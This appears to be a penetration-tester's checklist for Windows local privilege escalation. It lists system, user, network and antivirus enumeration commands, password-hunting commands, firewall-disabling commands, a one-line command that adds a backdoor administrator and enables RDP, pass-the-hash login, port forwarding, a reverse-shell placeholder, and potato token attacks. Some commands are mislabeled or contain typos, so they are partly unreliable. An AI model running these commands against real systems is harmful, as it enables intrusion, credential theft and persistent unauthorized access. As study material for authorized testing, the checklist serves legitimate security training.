Checklist - Local Windows Privilege Escalation

Checklist - Local Windows Privilege Escalation

Resources List

• Hackticks - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
• Fuzzy Security Guide - https://www.fuzzysecurity.com/tutorials/16.html
• PayloadsAllTheThings Guide - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
• Absolomb Windows Privilege Escalation Guide - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
• Sushant 747’s Guide (Country dependant - may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

Initial Enumeration

System Enumeration

• Read More here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#windows-version-and-configuration)

• Enumerating System to find out the system version and running processes.

  • For Command Prompt

  ~# systeminfo
  ~# systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type
  ~# wmic qfe
  ~# wmic qfe get Caption,Description,HotFixID,InstalledOn
  ~# wmic logicaldisk get caption,description,providername
  ~# wmic qfe get Caption,Description,HotFixID,InstalledOn            #Patches
  ~# wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%      #Get system architecture
  

  • For Powershell

  ~# [System.Environment]::OSVersion.Version                                                   #Current OS version
  ~# Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid}    #List all patches
  ~# Get-Hotfix -description "Security update"                                                 #List only "Security Update" patches
  

User Enumeration

• Read More here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#user-enumeration)

~# whoami /priv
~# whoami /groups
~# net user
~# net user <username>
~# net user administrator
~# net localgroup <user>

Network Enumeration

• Read More here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#network-enumeration)

~# ipconfig /all
~# arp -a
~# route print
~# netstat -ano

###  Firewall

~# netsh firewall show state
~# netsh firewall show config

Processes / Tasks Enumeration

• Read More Here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop—processes-enumeration-and-tasks)

• What processes are running?

  tasklist /v
  net start
  sc query
  Get-Service
  Get-Process
  Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
  

• Which processes are running as “system”

  tasklist /v /fi "username eq system"
  

• Do you have powershell magic?

  REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
  

• List installed programs

  Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
  Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
  

• List services

  net start
  wmic service list brief
  tasklist /SVC
  

• Enumerate scheduled tasks

  schtasks /query /fo LIST 2>nul | findstr TaskName
  schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
  Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
  

• Startup tasks

  wmic startup get caption,command
  reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
  reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
  dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
  

Password Hunting

• For more info Read (https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html)
• Looting For Passwords (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop—looting-for-passwords)

findstr /si password *.txt *.ini *.config
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

• Searching for passwords in Registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

• Searching for passwords In Files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Antivirus (AV) Enumeration

• Read More About AV Enumeratin here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#antivirus–detections)
• Antivirus Bypassing Methods
  • Bypassing Antivirus (https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html)
  • AV Bypass : Hacktricks (https://book.hacktricks.xyz/windows-hardening/av-bypass)
  • Bypassing Detection for a Reverse Meterpreter Shell (https://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
• AV Enumeration

~# sc query windefend                                                                                                      #Finding windows Defender
~# sc queryex type= service                                                                                                #To find out all services running ( may contain AV services as well)
~# WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName                            #Enumeratiing AV on a box
~# WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more        #Enumeratiing AV on a box
~# Get-MpComputerStatus 

Firewall Enumeration

• Read More here (https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#firewall-rules)

• Check out PayloadAllThings as well (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#firewall)

• List firewall state and current configuration

netsh advfirewall firewall dump
# or 

netsh firewall show state
netsh firewall show config

• List firewall’s blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

• Disable firewall

# Disable Firewall on Windows 7 via cmd

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Disable Firewall on Windows 7 via Powershell

powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

# Disable Firewall on any windows via cmd

netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off

• More Commands

netsh firewall show state # FW info, open ports

netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info

Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off

NetSh Advfirewall set allprofiles state on  #Trun On

netsh firewall set opmode disable #Turn Off


::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop" 

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed

::sc config TermService start= auto #I found that this line is not needed

::net start Termservice #I found that this line is not needed


::Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Using Credentials to Own Windows Boxes

Suppose we have the Windows domain credentials , Then how we can validate these credentials and Pop a Shell.

• To validate Credentials (Spray And Pray)

  • Metasploit’s smb_login : We can use metasploit’s auxiliary/scanner/smb/smb_login to validate the credentials.
  • CrackMapExec : This is a fairly new tool that I’ve fallen in love with lately. It’s written in Python and is extremely fast for testing credentials and launching attacks on a large number of hosts. You can get it from here: https://github.com/byt3bl33d3r/CrackMapExec

• Pop a Shell (Using Validated Credentials)

  • Metasploit psexec : The old classic. It’s actually been updated to take advantage of PowerShell if it’s present, but the underlying technique hasn’t changed, There is also auxiliary/admin/smb/psexec_command if you want to just run a single command. This module can also take a range of RHOSTS
  • Winexe : An old *nix tool to execute Windows commands remotely. Built in to Kali or available here. You can execute a single command or drop right into a command prompt.
  • Psexec.py : Part of the incredibly awesome Impacket library.
  • SmbExec.py : Another Impacket script. This one is a bit “stealthier” as it doesn’t drop a binary on the target system.
  • WmiExec.py : Yet another awesome Impacket script. Under the hood this one uses Windows Management Instrumentation (WMI) to launch a semi-interactive shell.
  • CrackMapExec : You can also use CrackMapExec to execute commands on hosts by passing it the “-x” parameter. Since it’s built on Impacket’s libraries, it’s basically doing the exact same thing as wmiexec.py, but let’s you do it across a range of IPs.
  • Using Remote Desktop : You can use Impacket’s rdp_check to see if you have RDP access, then use Kali’s rdesktop to connect.
  • Other Methods :
    • Besides executing commands, you can RDP (as seen above), or mount SMB shares using smbclient and download/upload files arbitrarily.
    • Use these methods to execute a post-exploitation toolkit, like Powershell Empire or a Meterpreter payload. These are just your “foot in the door”.

• To learn More Read these Blogs

  • Using Credentials to Own Windows Boxes - Part 1 (from Kali)
  • Using Credentials to Own Windows Boxes - Part 2 (PSExec and Services)
  • Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM)
  • https://book.hacktricks.xyz/windows-hardening/ntlm/psexec-and-winexec

Exploring Windows PrivEsc Automated Tools

Executables

• WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
• Seatbelt - https://github.com/GhostPack/Seatbelt
• Watson - https://github.com/rasta-mouse/Watson
• SharpUp - https://github.com/GhostPack/SharpUp

Powershell

• Sherlock - https://github.com/rasta-mouse/Sherlock
• PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
• JAWS-Enum - https://github.com/411Hall/JAWS

Other (Exploit Suggestors)

• Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

• Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

  run post/multi/recon/local_exploit_suggester

ESCALATION PATH

Escalation Path : Kernel Exploits

• Kernel Exploits Suggestors (On the system)
  • post/wwindows/gather/enum_patches
  • post/multi/recon/local_exploit_suggester
  • watson
  • winpeas (Winpeas has watson embedded)
• Locally with system information
  • https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • https://github.com/bitsadmin/wesng
• Github repos of Exploits
  • https://github.com/nomi-sec/PoC-in-GitHub
  • https://github.com/abatchy17/WindowsExploits
  • https://github.com/SecWiki/windows-kernel-exploits

Port Forwarding And Tunnelling

• Read More about Port Forwarding and tunnelling here (https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding)
• Check this as well (https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html)
• Using Plink for Port Forwarding (https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#plink.exe)

Escalation Path : Passwords and Port Forwarding

• Port Forwarding And Tunnelling
  • Read More about Port Forwarding and tunnelling here (https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding)
  • Using Plink for Port Forwarding (https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#plink.exe)

# Port forward using plink
plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101

• Check out this (https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#files-and-registry-credentials)
• Check the Above Password Hunting Section as well.

Escalation Path : Windows Subsystem For Linux

• Read more here (https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-subsystem-for-linux-wsl)
• Check this as well (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop—windows-subsystem-for-linux-wsl)
• Finding WSL and BASH in Windows System
  • where /R c:\windows bash.exe
  • where /R c:\windows wsl.exe
• If you get root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI if nc should be allowed by the firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

• You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Escalation Path : Impersonation and Potato Attacks

• Check the available Privileges for possible Privilege Escalation

  • You can check your own privileges with whoami /priv. Disabled privileges are as good as enabled ones. The only important thing is if you have the privilege on the list or not.
  • Privileges to look for in the list (Whether disabled or enabled not matters)
    • SeImpersonate
    • SeAssignPrimaryToken
    • SeTcb
    • SeBackup
    • SeRestore
    • SeCreateToken
    • SeLoadDriver
    • SeTakeOwnership
    • SeDebug
    • Check out the complete List Here

• Attacks using above Privileges

  • RottenPotato (Token Impersonation) - (Check This As well)
  • Juicy Potato (Abusing the golden privileges) - (Check This as well)
  • Rogue Potato (Fake OXID Resolver)
  • EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
  • Meterpreter getsystem and alternatives
  • Restore A Service Account’s Privileges

• Access Tokens (https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens)

• Privilege Escalation Abusing Tokens (https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens)

• Full token privileges cheatsheet at ****https://github.com/gtworek/Priv2Admin

• Read More Here (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop—impersonation-privileges)